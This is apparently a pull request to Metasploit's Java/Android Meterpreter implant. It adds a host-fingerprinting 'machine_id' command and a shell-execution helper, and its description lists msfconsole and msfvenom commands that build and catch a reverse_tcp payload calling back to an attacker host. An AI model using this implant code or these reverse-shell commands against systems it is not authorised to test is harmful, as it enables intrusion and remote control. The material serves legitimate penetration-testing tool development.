### PR TITLE
add machine_id and fix android sysinfo as root

### DIFF
--- a/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_config_sysinfo_android.java
+++ b/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_config_sysinfo_android.java
@@ -5,6 +5,7 @@ import java.net.InetAddress;
 import com.metasploit.meterpreter.Meterpreter;
 import com.metasploit.meterpreter.TLVPacket;
 import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.Utils;
 import com.metasploit.meterpreter.command.Command;
 import com.metasploit.meterpreter.stdapi.stdapi_sys_config_sysinfo;
 
@@ -15,15 +16,11 @@ public class stdapi_sys_config_sysinfo_android extends
 
     public int execute(Meterpreter meterpreter, TLVPacket request,
                        TLVPacket response) throws Exception {
-
-        String androidOS = Build.VERSION.RELEASE;
-
-        response.add(TLVType.TLV_TYPE_COMPUTER_NAME, InetAddress.getLocalHost()
-                .getHostName());
-        response.add(TLVType.TLV_TYPE_OS_NAME,
-                "Android " + androidOS + " - " + System.getProperty("os.name")
-                        + " " + System.getProperty("os.version") + " ("
-                        + System.getProperty("os.arch") + ")");
+        String androidOS = Utils.runCommand("getprop ro.build.version.release").replace("\n", "");
+        response.add(TLVType.TLV_TYPE_COMPUTER_NAME, InetAddress.getLocalHost().getHostName());
+        response.add(TLVType.TLV_TYPE_OS_NAME, "Android " + androidOS
+                + " - " + System.getProperty("os.name")
+                + " " + System.getProperty("os.version") + " (" + System.getProperty("os.arch") + ")");
         return ERROR_SUCCESS;
     }
 }

--- a/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java
+++ b/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/TLVType.java
@@ -43,18 +43,21 @@ public interface TLVType {
     public static final int TLV_TYPE_MIGRATE_PID = TLVPacket.TLV_META_TYPE_UINT | 402;
     public static final int TLV_TYPE_MIGRATE_LEN = TLVPacket.TLV_META_TYPE_UINT | 403;
 
-    public static final int TLV_TYPE_TRANS_TYPE          = TLVPacket.TLV_META_TYPE_UINT   | 430;
-    public static final int TLV_TYPE_TRANS_URL           = TLVPacket.TLV_META_TYPE_STRING | 431;
-    public static final int TLV_TYPE_TRANS_UA            = TLVPacket.TLV_META_TYPE_STRING | 432;
-    public static final int TLV_TYPE_TRANS_COMM_TIMEOUT  = TLVPacket.TLV_META_TYPE_UINT   | 433;
-    public static final int TLV_TYPE_TRANS_SESSION_EXP   = TLVPacket.TLV_META_TYPE_UINT   | 434;
-    public static final int TLV_TYPE_TRANS_CERT_HASH     = TLVPacket.TLV_META_TYPE_RAW    | 435;
-    public static final int TLV_TYPE_TRANS_PROXY_HOST    = TLVPacket.TLV_META_TYPE_STRING | 436;
-    public static final int TLV_TYPE_TRANS_PROXY_USER    = TLVPacket.TLV_META_TYPE_STRING | 437;
-    public static final int TLV_TYPE_TRANS_PROXY_PASS    = TLVPacket.TLV_META_TYPE_STRING | 438;
-    public static final int TLV_TYPE_TRANS_RETRY_TOTAL   = TLVPacket.TLV_META_TYPE_UINT   | 439;
-    public static final int TLV_TYPE_TRANS_RETRY_WAIT    = TLVPacket.TLV_META_TYPE_UINT   | 440;
-    public static final int TLV_TYPE_TRANS_GROUP         = TLVPacket.TLV_META_TYPE_GROUP  | 441;
+    public static final int TLV_TYPE_TRANS_TYPE = TLVPacket.TLV_META_TYPE_UINT | 430;
+    public static final int TLV_TYPE_TRANS_URL = TLVPacket.TLV_META_TYPE_STRING | 431;
+    public static final int TLV_TYPE_TRANS_UA = TLVPacket.TLV_META_TYPE_STRING | 432;
+    public static final int TLV_TYPE_TRANS_COMM_TIMEOUT = TLVPacket.TLV_META_TYPE_UINT | 433;
+    public static final int TLV_TYPE_TRANS_SESSION_EXP = TLVPacket.TLV_META_TYPE_UINT | 434;
+    public static final int TLV_TYPE_TRANS_CERT_HASH = TLVPacket.TLV_META_TYPE_RAW | 435;
+    public static final int TLV_TYPE_TRANS_PROXY_HOST = TLVPacket.TLV_META_TYPE_STRING | 436;
+    public static final int TLV_TYPE_TRANS_PROXY_USER = TLVPacket.TLV_META_TYPE_STRING | 437;
+    public static final int TLV_TYPE_TRANS_PROXY_PASS = TLVPacket.TLV_META_TYPE_STRING | 438;
+    public static final int TLV_TYPE_TRANS_RETRY_TOTAL = TLVPacket.TLV_META_TYPE_UINT | 439;
+    public static final int TLV_TYPE_TRANS_RETRY_WAIT = TLVPacket.TLV_META_TYPE_UINT | 440;
+    public static final int TLV_TYPE_TRANS_GROUP = TLVPacket.TLV_META_TYPE_GROUP | 441;
+
+    public static final int TLV_TYPE_MACHINE_ID = TLVPacket.TLV_META_TYPE_STRING | 460;
+    public static final int TLV_TYPE_UUID = TLVPacket.TLV_META_TYPE_RAW | 461;
 
     public static final int TLV_TYPE_CIPHER_NAME = TLVPacket.TLV_META_TYPE_STRING | 500;
     public static final int TLV_TYPE_CIPHER_PARAMETERS = TLVPacket.TLV_META_TYPE_GROUP | 501;

--- a/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Utils.java
+++ b/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Utils.java
@@ -1,0 +1,20 @@
+package com.metasploit.meterpreter;
+
+import java.io.BufferedReader;
+import java.io.IOException;
+import java.io.InputStreamReader;
+
+public class Utils {
+
+    public static String runCommand(String command) throws IOException {
+        Process process = Runtime.getRuntime().exec(command);
+        BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream()));
+        StringBuffer stringBuffer = new StringBuffer();
+        String line;
+        while ((line = br.readLine()) != null) {
+            stringBuffer.append(line);
+            stringBuffer.append('\n');
+        }
+        return stringBuffer.toString();
+    }
+}

--- a/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/Loader.java
+++ b/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/Loader.java
@@ -18,5 +18,6 @@ public class Loader implements ExtensionLoader {
         mgr.registerCommand("core_channel_read", core_channel_read.class);
         mgr.registerCommand("core_channel_write", core_channel_write.class);
         mgr.registerCommand("core_loadlib", core_loadlib.class);
+        mgr.registerCommand("core_machine_id", core_machine_id.class);
     }
 }

--- a/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_machine_id.java
+++ b/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/core/core_machine_id.java
@@ -1,0 +1,62 @@
+package com.metasploit.meterpreter.core;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.TLVType;
+import com.metasploit.meterpreter.Utils;
+import com.metasploit.meterpreter.command.Command;
+
+import java.io.BufferedReader;
+import java.io.File;
+import java.io.IOException;
+import java.io.InputStreamReader;
+import java.net.InetAddress;
+import java.net.UnknownHostException;
+
+public class core_machine_id implements Command {
+
+    private static final String[] hdPrefixes = new String[]{"ata-", "mb-"};
+    private static String machine_id;
+
+    private String getSerial() throws IOException {
+        StringBuffer stringBuffer = new StringBuffer();
+        stringBuffer.append(Utils.runCommand("getprop ro.serialno"));
+        stringBuffer.append(Utils.runCommand("getprop ro.product.brand"));
+        stringBuffer.append(Utils.runCommand("getprop ro.product.model"));
+        return stringBuffer.toString();
+    }
+
+    private String getHDLabel() {
+        File folder = new File("/dev/disk/by-id/");
+        File[] listOfFiles = folder.listFiles();
+        if (listOfFiles == null) {
+            return null;
+        }
+        for (int i = 0; i < listOfFiles.length; i++) {
+            String hdname = listOfFiles[i].getName();
+            for (int j = 0; j < hdPrefixes.length; j++) {
+                String prefix = hdPrefixes[j];
+                if (hdname.startsWith(prefix)) {
+                    return hdname.substring(prefix.length());
+                }
+            }
+        }
+        return "";
+    }
+
+    private String getHostname() throws UnknownHostException {
+        return InetAddress.getLocalHost().getHostName();
+    }
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+        if (machine_id == null) {
+            String serial = getHDLabel();
+            if (serial == null) {
+                serial = getSerial();
+            }
+            machine_id = serial + ":" + getHostname();
+        }
+        response.add(TLVType.TLV_TYPE_MACHINE_ID, machine_id);
+        return ERROR_SUCCESS;
+    }
+}


### PR DESCRIPTION
Verification:
 - [x] Create a java (or android) session, and verify machine_id works
```
./msfconsole -qx "use exploit/multi/handler; set payload java/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
# run the java meterpreter
./msfvenom -p java/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -o met.jar
java -jar met.jar
```
 - [ ] Ensure you get a the same machine_id with the python/php meterpreter.
